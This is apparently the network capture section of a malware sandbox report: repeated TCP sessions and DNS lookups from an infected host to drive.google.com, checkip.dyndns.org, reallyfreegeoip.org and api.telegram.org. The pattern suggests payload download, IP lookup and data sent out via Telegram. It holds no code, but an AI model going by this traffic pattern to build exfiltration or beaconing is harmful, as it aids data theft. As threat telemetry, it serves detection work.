                                                                                                          Dec 18, 2024 09:52:31.319698095 CET8049825158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:31.319777966 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:31.319883108 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:31.439415932 CET8049825158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:32.536601067 CET8049825158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:32.537874937 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:32.537975073 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:32.538072109 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:32.538301945 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:32.538333893 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:32.576301098 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:33.907080889 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:33.908759117 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:33.908807039 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:33.908890963 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:33.908912897 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:34.620850086 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:34.620937109 CET44349831149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:34.621073008 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:34.621413946 CET49831443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:34.644675016 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:34.646018982 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:34.764703035 CET8049825158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:34.764828920 CET4982580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:34.765626907 CET8049837158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:34.765716076 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:34.765850067 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:34.885350943 CET8049837158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:35.967087030 CET8049837158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:35.968192101 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:35.968283892 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:35.968379021 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:35.968622923 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:35.968660116 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:36.013808012 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:37.332284927 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:37.333832026 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:37.333918095 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:37.334008932 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:37.334032059 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:38.101340055 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:38.101530075 CET44349843149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:38.101589918 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:38.101792097 CET49843443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:38.140476942 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:38.141376972 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:38.260708094 CET8049837158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:38.260812998 CET4983780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:38.260904074 CET8049849158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:38.260988951 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:38.261204004 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:38.380794048 CET8049849158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:39.591249943 CET8049849158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:39.592856884 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:39.592952013 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:39.593030930 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:39.593453884 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:39.593497038 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:39.638814926 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:40.960079908 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:40.964373112 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:40.964411020 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:40.964483976 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:40.964500904 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:41.586654902 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:41.586741924 CET44349850149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:41.586812019 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:41.587157965 CET49850443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:41.608697891 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:41.609642029 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:41.728961945 CET8049849158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:41.729054928 CET4984980192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:41.729183912 CET8049856158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:41.729260921 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:41.729394913 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:41.848864079 CET8049856158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:42.930677891 CET8049856158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:42.932022095 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:42.932040930 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:42.932118893 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:42.932351112 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:42.932367086 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:42.982572079 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:44.330214024 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:44.332461119 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:44.332487106 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:44.332554102 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:44.332562923 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:44.961417913 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:44.961512089 CET44349862149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:44.961579084 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:44.961916924 CET49862443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:44.985197067 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:44.986459017 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:45.105436087 CET8049856158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:45.105493069 CET4985680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:45.105938911 CET8049868158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:45.106018066 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:45.106144905 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:45.225987911 CET8049868158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:46.306411982 CET8049868158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:46.307641029 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:46.307689905 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:46.307780981 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:46.308005095 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:46.308036089 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:46.357590914 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:47.669991016 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:47.672173977 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:47.672205925 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:47.672297955 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:47.672311068 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:48.314515114 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:48.314815044 CET44349869149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:48.315136909 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:48.315557957 CET49869443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:48.361321926 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:48.362658978 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:48.481379032 CET8049868158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:48.482132912 CET8049875158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:48.482232094 CET4986880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:48.482269049 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:48.482367039 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:48.601850986 CET8049875158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:49.681303978 CET8049875158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:49.686981916 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:49.687030077 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:49.687222958 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:49.690995932 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:49.691014051 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:49.732666016 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.055653095 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.057159901 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:51.057174921 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.057228088 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:51.057249069 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.698477030 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.698761940 CET44349881149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.698941946 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:51.699182987 CET49881443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:51.723835945 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.724925995 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.844527960 CET8049887158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.844620943 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.844710112 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.852025032 CET8049875158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:51.852092028 CET4987580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:51.964287996 CET8049887158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:53.042521954 CET8049887158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:53.046677113 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:53.046727896 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:53.046804905 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:53.047123909 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:53.047141075 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:53.092046976 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:54.405947924 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:54.407435894 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:54.407471895 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:54.407613039 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:54.407619953 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:55.057032108 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:55.057225943 CET44349889149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:55.057281017 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:55.058763027 CET49889443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:55.265938997 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:55.267616987 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:55.387012959 CET8049887158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:55.387069941 CET4988780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:55.388365984 CET8049895158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:55.388442039 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:55.388598919 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:55.508068085 CET8049895158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:57.016340971 CET8049895158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:57.017498016 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:57.017544985 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:57.017623901 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:57.017890930 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:57.017908096 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:57.060726881 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:58.380543947 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:58.382185936 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:58.382219076 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:58.382277012 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:58.382287979 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:59.050038099 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:59.050221920 CET44349900149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:52:59.050394058 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:59.050551891 CET49900443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:52:59.071809053 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:59.072668076 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:59.191674948 CET8049895158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:59.191946983 CET4989580192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:59.192181110 CET8049906158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:52:59.192245007 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:59.192332029 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:52:59.311748028 CET8049906158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:00.438339949 CET8049906158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:00.439335108 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:00.439369917 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:00.439429045 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:00.439652920 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:00.439667940 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:00.482594967 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:01.804485083 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:01.808728933 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:01.808760881 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:01.808809996 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:01.808819056 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:02.514492989 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:02.514569998 CET44349912149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:02.514617920 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:02.514988899 CET49912443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:02.533278942 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:02.534424067 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:02.653413057 CET8049906158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:02.653484106 CET4990680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:02.653996944 CET8049918158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:02.654079914 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:02.654170990 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:02.773752928 CET8049918158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:03.855438948 CET8049918158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:03.856560946 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:03.856583118 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:03.856698990 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:03.856936932 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:03.856949091 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:03.904493093 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:05.218477964 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:05.220246077 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:05.220263958 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:05.220411062 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:05.220422983 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:06.047341108 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:06.047532082 CET44349920149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:06.047600985 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:06.048054934 CET49920443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:06.067146063 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:06.068330050 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:06.187036037 CET8049918158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:06.187496901 CET4991880192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:06.187810898 CET8049926158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:06.187876940 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:06.187999010 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:06.307420969 CET8049926158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:07.397157907 CET8049926158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:07.398750067 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:07.398819923 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:07.398891926 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:07.399235010 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:07.399264097 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:07.451370001 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:08.764087915 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:08.765867949 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:08.765918016 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:08.766011953 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:08.766033888 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:09.391886950 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:09.392096043 CET44349931149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:09.392369032 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:09.392488003 CET49931443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:09.415263891 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:09.416321993 CET4993780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:09.535228968 CET8049926158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:09.535291910 CET4992680192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:09.535878897 CET8049937158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:09.535953045 CET4993780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:11.861773014 CET4993780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:11.981956959 CET8049937158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:12.269438028 CET8049937158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:12.270621061 CET49943443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:12.270719051 CET44349943149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:12.270920038 CET49943443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:12.271219015 CET49943443192.168.2.4149.154.167.220
                                                                                                          Dec 18, 2024 09:53:12.271258116 CET44349943149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:12.310755968 CET4993780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:12.335921049 CET8049757158.101.44.242192.168.2.4
                                                                                                          Dec 18, 2024 09:53:12.336038113 CET4975780192.168.2.4158.101.44.242
                                                                                                          Dec 18, 2024 09:53:13.630956888 CET44349943149.154.167.220192.168.2.4
                                                                                                          Dec 18, 2024 09:53:13.685834885 CET49943443192.168.2.4149.154.167.220
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 18, 2024 09:51:44.117942095 CET6438953192.168.2.41.1.1.1
                                                                                                          Dec 18, 2024 09:51:44.255420923 CET53643891.1.1.1192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.026025057 CET5070953192.168.2.41.1.1.1
                                                                                                          Dec 18, 2024 09:51:47.264393091 CET53507091.1.1.1192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.570457935 CET5474653192.168.2.41.1.1.1
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET53547461.1.1.1192.168.2.4
                                                                                                          Dec 18, 2024 09:51:55.089297056 CET5708853192.168.2.41.1.1.1
                                                                                                          Dec 18, 2024 09:51:55.416214943 CET53570881.1.1.1192.168.2.4
                                                                                                          Dec 18, 2024 09:52:03.681749105 CET6434753192.168.2.41.1.1.1
                                                                                                          Dec 18, 2024 09:52:03.818588018 CET53643471.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 18, 2024 09:51:44.117942095 CET192.168.2.41.1.1.10x669aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:47.026025057 CET192.168.2.41.1.1.10x62eaStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.570457935 CET192.168.2.41.1.1.10xc655Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:55.089297056 CET192.168.2.41.1.1.10x8a89Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:52:03.681749105 CET192.168.2.41.1.1.10x41c9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 18, 2024 09:51:44.255420923 CET1.1.1.1192.168.2.40x669aNo error (0)drive.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:47.264393091 CET1.1.1.1192.168.2.40x62eaNo error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:52.707284927 CET1.1.1.1192.168.2.40xc655No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:55.416214943 CET1.1.1.1192.168.2.40x8a89No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                          Dec 18, 2024 09:51:55.416214943 CET1.1.1.1192.168.2.40x8a89No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
